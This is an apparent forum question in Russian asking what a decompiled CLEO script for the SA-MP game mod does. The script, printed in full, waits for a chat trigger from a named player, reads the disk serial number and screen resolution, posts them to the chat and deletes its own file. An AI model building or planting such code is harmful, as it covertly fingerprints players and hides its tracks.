- 150
- 31
Хотел бы узнать, что делает этот скрипт?
{$CLEO .cs}
0000: NOP
wait 0
else_jump @NONAME_2
alloc 16@ 560
alloc 3@ 560
alloc 4@ 560
wait 0
SAMP.GetChatString(99, 16@, 0, 0, 0)
if and
0C29: 29@ = stristr string1 16@ string2 "Bounty_Bomjiano:"
0C29: 29@ = stristr string1 16@ string2 "[G]"
0C29: 29@ = stristr string1 16@ string2 "get"
else_jump @NONAME_205
call @NONAME_212 0 0@
SAMP.GetScreenResolution(3@, 4@)
alloc 1@ 16
format 1@ "%X" 0@
say "%s %i %i" 1@ 3@ 4@
0B00: delete_file "CLEO\checker.cs" // IF and SET
0BDE: pause_thread 0
jump @NONAME_39
0AA2: 25@ = load_library "Kernel32.DLL" // IF and SET
0AA4: 26@ = get_proc_address "GetVolumeInformationA" library 25@ // IF and SET
0AC7: 27@ = var 27@ offset
0AA7: call_function 26@ num_params 8 pop 0 0 0 0 0 27@ 0 0 0 28@
0AA3: free_library 25@
ret 1 27@